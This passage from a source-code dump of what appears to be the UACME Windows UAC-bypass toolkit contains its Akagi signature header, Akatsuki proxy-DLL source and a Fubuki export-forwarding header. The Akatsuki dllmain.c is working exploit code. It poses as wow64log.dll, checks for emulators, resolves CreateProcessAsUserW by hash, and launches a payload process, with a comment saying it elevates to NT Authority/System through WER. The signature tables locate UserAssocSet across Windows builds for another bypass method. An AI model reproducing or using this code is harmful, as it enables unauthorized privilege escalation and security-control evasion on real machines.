pcasvc\\w7\n \n \n Source Files\n \n \n Source Files\\methods\n \n \n Source Files\n \n \n Source Files\\methods\n \n \n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n minirtl\n \n \n testunits\n \n \n ldr\n \n \n Header Files\n \n \n Header Files\n \n \n Source Files\\methods\n \n \n Source Files\\methods\n \n \n Source Files\\methods\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n hde\n \n \n hde\n \n \n hde\n \n \n Header Files\n \n \n Header Files\n \n \n Source Files\\methods\n \n \n Header Files\n \n \n \n \n Resource Files\n \n \n Resource Files\n \n \n Resource Files\n \n \n \n \n Resource Files\n \n \n \n \n Header Files\n \n \n"
},
{
"path": "Source/Akagi/uacme.vcxproj.user",
"content": "\n\n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n WindowsLocalDebugger\n \n \n 78\n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n 71\n WindowsLocalDebugger\n \n \n 71\n WindowsLocalDebugger\n \n \n 0\n WindowsLocalDebugger\n 78|0|\n \n \n 78\n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Akagi/uas.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2021 - 2024\n*\n* TITLE: UAS.H\n*\n* VERSION: 3.66\n*\n* DATE: 22 Jul 2024\n*\n* UserAssocSet signature file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n//\n// UserAssocSet patterns.\n//\n\n// mov r8, [rbx + 40h]\n// mov rdx, [rbx + 38h]\n// mov ecx, 1\n// call UserAssocSet\nstatic BYTE UserAssocSet_7601[] = {\n 0x4C, 0x8B, 0x43, 0x40, 0x48, 0x8B, 0x53, 0x38, 0xB9, 0x01, 0x00, 0x00, 0x00\n};\n\n// mov r8, rsi\n// mov rdx, rbx\n// mov ecx, 2\n// call UserAssocSet\nstatic BYTE UserAssocSet_9600[] = {\n 0x4C, 0x8B, 0xC6, 0x48, 0x8B, 0xD3, 0xB9, 0x02, 0x00, 0x00, 0x00\n};\n\n// imul rax, 4Eh\n// mov ecx, 2\n// add r8, rax\n// call UserAssocSet\nstatic BYTE UserAssocSet_14393[] = {\n 0x48, 0x6B, 0xC0, 0x4E, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x4C, 0x03, 0xC0\n};\n\n// mov r8, rsi\n// mov r9d, ecx\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_17763_v1554[] = {\n 0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7\n};\n\n// mov ecx, r9d\n// mov r8, rdi\n// mov rdx, rsi\n// call UserAssocSet\nstatic BYTE UserAssocSet_17763_v1728[] = {\n 0x41, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6\n};\n\n// mov ecx, eax\n// mov r8, rdi\n// mov rdx, rbp\n// call UserAssocSet\nstatic BYTE UserAssocSet_17763_v1971[] = {\n 0x44, 0x8B, 0xC8, 0x8B, 0xC8, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5\n};\n\n// mov r9d, ecx\n// mov r8, rsi\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_18362[] = {\n 0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7\n};\n\nstatic BYTE UserAssocSet_18362_v2[] = {\n 0x4C, 0x8B, 0xC7, 0x41, 0x8B, 0xC9, 0x48, 0x8B, 0xD6\n};\n\n// mov r8, rsi\n// mov r9d, ecx\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_18363[] = {\n 0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7\n};\n\n// mov r9d, ecx\n// mov r8, rsi\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_19041[] = {\n 0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7\n};\n\n// mov r8, rdi\n// mov rdx, rsi\n// mov ecx, r9d\n// call UserAssocSet\nstatic BYTE UserAssocSet_19042[] = {\n 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6, 0x41, 0x8B, 0xC9\n};\n\n// mov r8, rdi\n// mov rdx, rbp\n// mov ecx, eax\n// call UserAssocSet\nstatic BYTE UserAssocSet_19043_v1023[] = {\n 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5, 0x8B, 0xC8\n};\n\n// mov r8, rsi\n// mov rdx, r14\n// mov eax, ecx\n// call UserAssocSet\nstatic BYTE UserAssocSet_22000[] = {\n 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD6, 0x8B, 0xC8\n};\n\n// mov r9d, ecx\n// mov r8, rdi\n// mov rdx, r14\n// call UserAssocSet\nstatic BYTE UserAssocSet_22621[] = {\n 0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x49, 0x8B, 0xD6\n};\n\n// mov r8, rsi\n// mov rdx, r15\n// lea ecx, [r9 + 2]\n// call UserAssocSet\nstatic BYTE UserAssocSet_26100[] = {\n 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7, 0x41, 0x8D, 0x49, 0x02\n};\n\n//\n// End of UserAssocSet patterns.\n//\n\n//\n// Windows 7 SP1 7601\n//\nUSER_ASSOC_PATTERN UAS_7601 = { UserAssocSet_7601, sizeof(UserAssocSet_7601) };\nPVOID UAS_PATTERN_TABLE_7601[] = { &UAS_7601 };\nUSER_ASSOC_SIGNATURE UAS_SIG_7601 = { NT_WIN7_SP1, NT_WIN7_SP1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_7601), &UAS_PATTERN_TABLE_7601 };\n\n//\n// Windows 8 (9600)\n//\nUSER_ASSOC_PATTERN UAS_9600 = { UserAssocSet_9600, sizeof(UserAssocSet_9600) };\nPVOID UAS_PATTERN_TABLE_9600[] = { &UAS_9600 };\nUSER_ASSOC_SIGNATURE UAS_SIG_9600 = { NT_WIN8_BLUE, NT_WIN8_BLUE, RTL_NUMBER_OF(UAS_PATTERN_TABLE_9600), &UAS_PATTERN_TABLE_9600 };\n\n//\n// Windows 10 1607 (14393)\n//\nUSER_ASSOC_PATTERN UAS_14393 = { UserAssocSet_14393, sizeof(UserAssocSet_14393) };\nPVOID UAS_PATTERN_TABLE_14393[] = { &UAS_14393 };\nUSER_ASSOC_SIGNATURE UAS_SIG_14393 = { NT_WIN10_REDSTONE1, NT_WIN10_REDSTONE1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_14393), &UAS_PATTERN_TABLE_14393 };\n\n//\n// Windows 10 1809 (17763)\n//\nUSER_ASSOC_PATTERN UAS_17763_1554 = { UserAssocSet_17763_v1554, sizeof(UserAssocSet_17763_v1554) };\nUSER_ASSOC_PATTERN UAS_17763_1728 = { UserAssocSet_17763_v1728, sizeof(UserAssocSet_17763_v1728) };\nUSER_ASSOC_PATTERN UAS_17763_1971 = { UserAssocSet_17763_v1971, sizeof(UserAssocSet_17763_v1971) };\nPVOID UAS_PATTERN_TABLE_17763[] = { &UAS_17763_1554, &UAS_17763_1728, &UAS_17763_1971 };\nUSER_ASSOC_SIGNATURE UAS_SIG_17763 = { NT_WIN10_REDSTONE5, NT_WIN10_REDSTONE5, RTL_NUMBER_OF(UAS_PATTERN_TABLE_17763), &UAS_PATTERN_TABLE_17763 };\n\n//\n// Windows 10 1903 (18362)\n//\nUSER_ASSOC_PATTERN UAS_18362 = { UserAssocSet_18362, sizeof(UserAssocSet_18362) };\nUSER_ASSOC_PATTERN UAS_18362_1350 = { UserAssocSet_18362_v2, sizeof(UserAssocSet_18362_v2) };\nPVOID UAS_PATTERN_TABLE_18362[] = { &UAS_18362, &UAS_18362_1350 };\nUSER_ASSOC_SIGNATURE UAS_SIG_18362 = { NT_WIN10_19H1, NT_WIN10_19H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18362), &UAS_PATTERN_TABLE_18362 };\n\n//\n// Windows 10 1909 (18363)\n//\nUSER_ASSOC_PATTERN UAS_18363 = { UserAssocSet_18363, sizeof(UserAssocSet_18363) };\nPVOID UAS_PATTERN_TABLE_18363[] = { &UAS_18363, &UAS_18362_1350 };\nUSER_ASSOC_SIGNATURE UAS_SIG_18363 = { NT_WIN10_19H2, NT_WIN10_19H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18363), &UAS_PATTERN_TABLE_18363 };\n\n//\n// Windows 10 2004 (19041)\n//\nUSER_ASSOC_PATTERN UAS_19041 = { UserAssocSet_19041, sizeof(UserAssocSet_19041) };\nUSER_ASSOC_PATTERN UAS_19042_789 = { UserAssocSet_19042, sizeof(UserAssocSet_19042) }; //same as for 19042\nPVOID UAS_PATTERN_TABLE_19041[] = { &UAS_19041, &UAS_19042_789 };\nUSER_ASSOC_SIGNATURE UAS_SIG_19041 = { NT_WIN10_20H1, NT_WIN10_20H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19041), &UAS_PATTERN_TABLE_19041 };\n\n//\n// Windows 10 2009 (19042/19043/19044)\n//\nUSER_ASSOC_PATTERN UAS_19043 = { UserAssocSet_19043_v1023, sizeof(UserAssocSet_19043_v1023) };\nPVOID UAS_PATTERN_TABLE_19042_19043[] = { &UAS_19042_789, &UAS_19043 };\nUSER_ASSOC_SIGNATURE UAS_SIG_19042_19043 = { NT_WIN10_20H2, NT_WIN10_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19042_19043), &UAS_PATTERN_TABLE_19042_19043 };\n\n// Windows 11 21H2 (22000)\nUSER_ASSOC_PATTERN UAS_22000 = { UserAssocSet_22000, sizeof(UserAssocSet_22000) };\nPVOID UAS_PATTERN_TABLE_22000[] = { &UAS_22000 };\nUSER_ASSOC_SIGNATURE UAS_SIG_22000 = { NT_WIN11_21H2 , NT_WIN11_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22000), &UAS_PATTERN_TABLE_22000 };\n\n//\n// Windows 11 22H2-23H2 (22621/22631)\n//\nUSER_ASSOC_PATTERN UAS_22621 = { UserAssocSet_22621, sizeof(UserAssocSet_22621) };\nPVOID UAS_PATTERN_TABLE_22621[] = { &UAS_22621 };\nUSER_ASSOC_SIGNATURE UAS_SIG_22621 = { NT_WIN11_22H2, NT_WIN11_23H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22621), &UAS_PATTERN_TABLE_22621 };\n\n//\n// Windows 11 24H2 (26100+)\n//\nUSER_ASSOC_PATTERN UAS_26100 = { UserAssocSet_26100, sizeof(UserAssocSet_26100) };\nPVOID UAS_PATTERN_TABLE_26100[] = { &UAS_26100 };\nUSER_ASSOC_SIGNATURE UAS_SIG_26100 = { NT_WIN11_24H2, NT_WIN11_24H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_26100), &UAS_PATTERN_TABLE_26100 };\n"
},
{
"path": "Source/Akatsuki/Akatsuki.vcxproj",
"content": "\n\n \n \n Debug\n x64\n \n \n ReleaseInternal\n x64\n \n \n Release\n x64\n \n \n \n {07EF7652-1C2D-478B-BB4B-F9560695A387}\n Win32Proj\n Akatsuki\n 10.0\n \n \n \n DynamicLibrary\n true\n v145\n Unicode\n false\n \n \n DynamicLibrary\n false\n v145\n true\n Unicode\n false\n \n \n DynamicLibrary\n false\n v145\n true\n Unicode\n false\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n SecurityRules.ruleset\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n false\n AllRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n false\n SecurityRules.ruleset\n \n \n \n \n \n Level4\n Disabled\n _DEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n true\n DllMain\n 6.0\n export.def\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)\n false\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n true\n true\n false\n DllMain\n true\n 6.0\n export.def\n \n \n \n \n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)\n false\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n true\n true\n false\n DllMain\n true\n 6.0\n export.def\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akatsuki64.dll\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Akatsuki/Akatsuki.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {f47eeec1-a71b-4ee9-b4eb-12077afe72ca}\n \n \n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n Source Files\n \n \n Source Files\n \n \n \n \n minirtl\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n \n \n Source Files\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Akatsuki/Akatsuki.vcxproj.user",
"content": "\n\n \n"
},
{
"path": "Source/Akatsuki/dllmain.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2022\n*\n* TITLE: DLLMAIN.C\n*\n* VERSION: 3.61\n*\n* DATE: 22 Jun 2022\n*\n* Proxy dll entry point, Akatsuki.\n* Special dll for wow64 logger method.\n* \n* WARNING: real wow64log must have native subsystem and only ntdll export.\n* This one will force crash and propagate to WER process elevating to NTAuthority/System.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\shared.h\"\n#include \"shared\\libinc.h\"\n\n#define LoadedMsg TEXT(\"Akatsuki lock and loaded\")\n\nHANDLE g_SyncMutant = NULL;\n\nUACME_PARAM_BLOCK g_SharedParams;\n\n\n/*\n* DummyFunc\n*\n* Purpose:\n*\n* Stub for fake exports.\n*\n*/\nVOID WINAPI DummyFunc(\n VOID\n)\n{\n\n}\n\n/*\n* DbgDumpRuntimeInfo\n*\n* Purpose:\n*\n* Dump runtime info to the file, this routine is only for debug builds.\n*\n*/\nVOID DbgDumpRuntimeInfo()\n{\n HANDLE hFile = INVALID_HANDLE_VALUE;\n WCHAR szReportName[MAX_PATH * 2];\n WCHAR sysdir[MAX_PATH + 1];\n\n DWORD cch;\n LPWSTR lpText = NULL;\n\n DWORD bytesIO;\n WCHAR ch;\n\n cch = ucmExpandEnvironmentStrings(L\"%temp%\\\\\", sysdir, MAX_PATH);\n if ((cch != 0) && (cch < MAX_PATH)) {\n _strcpy(szReportName, sysdir);\n _strcat(szReportName, TEXT(\"report_\"));\n ultostr(GetCurrentProcessId(), _strend(szReportName));\n _strcat(szReportName, TEXT(\".txt\"));\n\n hFile = CreateFile(szReportName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);\n if (hFile != INVALID_HANDLE_VALUE) {\n\n ch = (WCHAR)0xFEFF;\n WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL);\n\n lpText = ucmQueryRuntimeInfo(TRUE);\n if (lpText) {\n WriteFile(hFile, lpText, (DWORD)(_strlen(lpText) * sizeof(WCHAR)), &bytesIO, NULL);\n ucmDestroyRuntimeInfo(lpText);\n }\n CloseHandle(hFile);\n }\n }\n}\n\n#define Hash_CreateProcessAsUserW 0xb75be93c\n\n/*\n* InitFunctionPtr\n*\n* Purpose:\n*\n* Retrieve required function ptr.\n*\n*/\nPVOID InitFunctionPtr(\n VOID\n)\n{\n UNICODE_STRING usKernel = RTL_CONSTANT_STRING(L\"kernel32.dll\");\n UNICODE_STRING usAdvapi = RTL_CONSTANT_STRING(L\"advapi32.dll\");\n\n NTSTATUS ntStatus;\n PVOID ImageBase = NULL, dummy;\n\n ntStatus = LdrLoadDll(NULL, NULL, &usKernel, &dummy);\n if (NT_SUCCESS(ntStatus)) {\n\n ntStatus = LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,\n NULL, NULL, &usAdvapi, &ImageBase);\n\n if (!NT_SUCCESS(ntStatus)) {\n ntStatus = LdrLoadDll(NULL, NULL, &usAdvapi, &ImageBase);\n }\n\n if (NT_SUCCESS(ntStatus)) {\n return ucmGetProcedureAddressByHash(ImageBase, Hash_CreateProcessAsUserW);\n }\n }\n\n return NULL;\n}\n\n/*\n* DefaultPayload\n*\n* Purpose:\n*\n* Process parameter if exist or start cmd.exe and exit immediatelly.\n*\n*/\nVOID DefaultPayload(\n VOID\n)\n{\n BOOL bSharedParamsReadOk;\n UINT ExitCode = 0;\n PWSTR lpParameter;\n ULONG cbParameter;\n\n BOOL bIsLocalSystem = FALSE;\n ULONG SessionId;\n\n PFNCREATEPROCESSASUSERW pCreateProcessAsUser;\n\n if (!NT_SUCCESS(ucmCreateSyncMutant(&g_SyncMutant))) {\n RtlExitUserProcess(STATUS_SUCCESS);\n return;\n }\n\n //\n // Read shared params block.\n //\n RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n if (bSharedParamsReadOk) {\n lpParameter = g_SharedParams.szParameter;\n cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n SessionId = g_SharedParams.SessionId;\n }\n else {\n lpParameter = NULL;\n cbParameter = 0UL;\n SessionId = 0;\n }\n\n ucmIsLocalSystem(&bIsLocalSystem);\n\n pCreateProcessAsUser = (PFNCREATEPROCESSASUSERW)InitFunctionPtr();\n\n if (pCreateProcessAsUser) {\n\n ExitCode = (ucmLaunchPayload2(\n pCreateProcessAsUser,\n bIsLocalSystem,\n SessionId,\n lpParameter,\n cbParameter) != FALSE);\n\n }\n //\n // Notify Akagi.\n //\n if (bSharedParamsReadOk) {\n ucmSetCompletion(g_SharedParams.szSignalObject);\n }\n\n ucmSleep(5000);\n\n NtClose(g_SyncMutant);\n\n RtlExitUserProcess(ExitCode);\n}\n\n/*\n* DllMain\n*\n* Purpose:\n*\n* Proxy dll entry point.\n*\n*/\nBOOL WINAPI DllMain(\n _In_ HINSTANCE hinstDLL,\n _In_ DWORD fdwReason,\n _In_ LPVOID lpvReserved\n)\n{\n UNREFERENCED_PARAMETER(hinstDLL);\n UNREFERENCED_PARAMETER(lpvReserved);\n\n ucmDbgMsg(LoadedMsg);\n\n if (wdIsEmulatorPresent() == STATUS_NEEDS_REMEDIATION)\n RtlExitUserProcess('Foff');\n\n if (fdwReason == DLL_PROCESS_ATTACH) {\n\n LdrDisableThreadCalloutsForDll(hinstDLL); \n DefaultPayload();\n\n }\n return TRUE;\n}\n\n/*\n* EntryPointExeMode\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointExeMode(\n VOID\n)\n{\n BOOL IsDll = RtlImageNtHeader(GetModuleHandle(NULL))->FileHeader.Characteristics & IMAGE_FILE_DLL;\n if (!IsDll) {\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n DefaultPayload();\n }\n}\n"
},
{
"path": "Source/Akatsuki/export.def",
"content": "EXPORTS\nWow64LogSystemService = DummyFunc\nWow64LogInitialize = DummyFunc\nWow64LogTerminate = DummyFunc\nWow64LogMessageArgList = EntryPointExeMode\n"
},
{
"path": "Source/Akatsuki/resource.h",
"content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by version.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE 101\n#define _APS_NEXT_COMMAND_VALUE 40001\n#define _APS_NEXT_CONTROL_VALUE 1001\n#define _APS_NEXT_SYMED_VALUE 101\n#endif\n#endif\n"
},
{
"path": "Source/Fubuki/atldll.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2023\n*\n* TITLE: ATLDLL.H\n*\n* VERSION: 3.64\n*\n* DATE: 04 Feb 2023\n*\n* ATL forwarded import.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#pragma comment(linker, \" /EXPORT:AtlAdvise=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAdvise,@10\")\n#pragma comment(linker, \" /EXPORT:AtlAxAttachControl=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxAttachControl,@41\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateControl=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateControl,@39\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateControlEx=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateControlEx,@40\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateDialogA=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateDialogA,@38\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateDialogW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateDialogW,@37\")\n#pragma comment(linker, \" /EXPORT:AtlAxDialogBoxA=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxDialogBoxA,@36\")\n#pragma comment(linker, \" /EXPORT:AtlAxDialogBoxW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxDialogBoxW,@35\")\n#pragma comment(linker, \" /EXPORT:AtlAxGetControl=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxGetControl,@47\")\n#pragma comment(linker, \" /EXPORT:AtlAxGetHost=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxGetHost,@48\")\n#pragma comment(linker, \" /EXPORT:AtlAxWinInit=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxWinInit,@42\")\n#pragma comment(linker, \" /EXPORT:AtlComPtrAssign=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlComPtrAssign,@30\")\n#pragma comment(linker, \" /EXPORT:AtlComQIPtrAssign=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlComQIPtrAssign,@31\")\n#pragma comment(linker, \" /EXPORT:AtlCreateTargetDC=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlCreateTargetDC,@26\")\n#pragma comment(linker, \" /EXPORT:AtlDevModeW2A=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlDevModeW2A,@29\")\n#pragma comment(linker, \" /EXPORT:AtlFreeMarshalStream=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlFreeMarshalStream,@12\")\n#pragma comment(linker, \" /EXPORT:AtlGetObjectSourceInterface=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlGetObjectSourceInterface,@54\")\n#pragma comment(linker, \" /EXPORT:AtlGetVersion=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlGetVersion,@34\")\n#pragma comment(linker, \" /EXPORT:AtlHiMetricToPixel=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlHiMetricToPixel,@27\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistPropertyBag_Load=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistPropertyBag_Load,@52\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistPropertyBag_Save=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistPropertyBag_Save,@53\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistStreamInit_GetSizeMax=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistStreamInit_GetSizeMax,@60\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistStreamInit_Load=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistStreamInit_Load,@50\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistStreamInit_Save=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistStreamInit_Save,@51\")\n#pragma comment(linker, \" /EXPORT:AtlInternalQueryInterface=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlInternalQueryInterface,@32\")\n#pragma comment(linker, \" /EXPORT:AtlMarshalPtrInProc=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlMarshalPtrInProc,@13\")\n#pragma comment(linker, \" /EXPORT:AtlModuleAddCreateWndData=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleAddCreateWndData,@43\")\n#pragma comment(linker, \" /EXPORT:AtlModuleAddTermFunc=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleAddTermFunc,@58\")\n#pragma comment(linker, \" /EXPORT:AtlModuleExtractCreateWndData=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleExtractCreateWndData,@44\")\n#pragma comment(linker, \" /EXPORT:AtlModuleGetClassObject=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleGetClassObject,@15\")\n#pragma comment(linker, \" /EXPORT:AtlModuleInit=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleInit,@16\")\n#pragma comment(linker, \" /EXPORT:AtlModuleLoadTypeLib=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleLoadTypeLib,@56\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterClassObjects=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterClassObjects,@17\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterServer=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterServer,@18\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterTypeLib=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterTypeLib,@19\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterWndClassInfoA=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterWndClassInfoA,@46\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterWndClassInfoW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterWndClassInfoW,@45\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRevokeClassObjects=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRevokeClassObjects,@20\")\n#pragma comment(linker, \" /EXPORT:AtlModuleTerm=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleTerm,@21\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUnRegisterTypeLib=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUnRegisterTypeLib,@55\")\n#pragma comment(linker, \" 